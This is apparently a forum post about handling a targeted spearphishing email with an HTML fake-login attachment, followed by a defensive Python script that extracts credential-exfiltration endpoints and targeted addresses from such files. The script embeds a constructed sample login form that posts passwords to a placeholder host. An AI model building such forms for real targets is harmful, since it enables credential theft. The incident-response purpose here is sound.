An employee at my company received a spearphishing email, but fortunately she reported it to us before submitting any credentials. Running internal phishing awareness campaigns works!
The email contained a classic HTML file with a fake login; the employee’s email was hard-coded into the code, so this was a targeted attack. Upon inspecting the file I found a domain from southwest Europe to which the credentials were supposed to be sent, which had no reports anywhere so far. We suspect the server might be compromised or abandoned, since it hosts a legitimate website. The domain was blocked nonetheless.
I have also identified the email server which sent the email and immediately blocked the IP addresses and email domains related to it. The company that owns the email domain has a website, and its DNS records show an IP address that has been reported several times as an address used for malware delivery.
I don’t have much experience with spearphishing yet. My company does not yet produce intelligence reports or bulletins, but I think I would like to do more about this campaign. What other steps should we take to further investigate or disclose this campaign? How do you guys handle spearphishing campaigns?
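One way to triage an HTML credential-phishing attachment like the one described above, as an added example that is not part of the original post: pull the form submission target (where stolen credentials would be posted), any hard-coded recipient address, and the domains worth reviewing or blocking. The sample HTML and all hostnames are constructed.

```python
"""Triage a fake-login HTML attachment: extract the exfiltration endpoint,
the hard-coded target address and candidate block-list domains.
Added example (not from the original post); SAMPLE_HTML is constructed."""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample resembling a "classic" fake-login attachment.
SAMPLE_HTML = """<html><body>
<form method="POST" action="https://compromised-site.example/wp-content/post.php">
<input type="email" name="user" value="victim@corp.example">
<input type="password" name="pass">
<script>var u="victim@corp.example";var x="https://cdn.example/logo.png";</script>
</form></body></html>"""

EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")
URL_RE = re.compile(r"https?://[^\s'\"<>]+")


class PhishFormParser(HTMLParser):
    """Collects form submission targets and pre-filled input values."""

    def __init__(self):
        super().__init__()
        self.actions = []      # (method, action URL) per <form>
        self.prefilled = {}    # input name -> hard-coded value

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form" and a.get("action"):
            self.actions.append((a.get("method", "GET").upper(), a["action"]))
        elif tag == "input" and a.get("name") and a.get("value"):
            self.prefilled[a["name"]] = a["value"]


def triage(html: str) -> dict:
    """Return the indicators a defender needs from a phishing HTML file."""
    p = PhishFormParser()
    p.feed(html)
    exfil = [u for _, u in p.actions]          # where credentials would be sent
    urls = sorted(set(URL_RE.findall(html)))   # every URL in markup or script
    hosts = {urlparse(u).hostname for u in urls + exfil}
    return {"exfil_endpoints": exfil,
            "methods": [m for m, _ in p.actions],
            "targeted_recipients": sorted(set(EMAIL_RE.findall(html))),
            "prefilled_fields": p.prefilled,
            "domains_to_review": sorted(h for h in hosts if h)}


if __name__ == "__main__":
    for key, value in triage(SAMPLE_HTML).items():
        print(f"{key}: {value}")
```

The exfiltration host is the one to block and to report to the hosting provider; the pre-filled address confirms who was targeted.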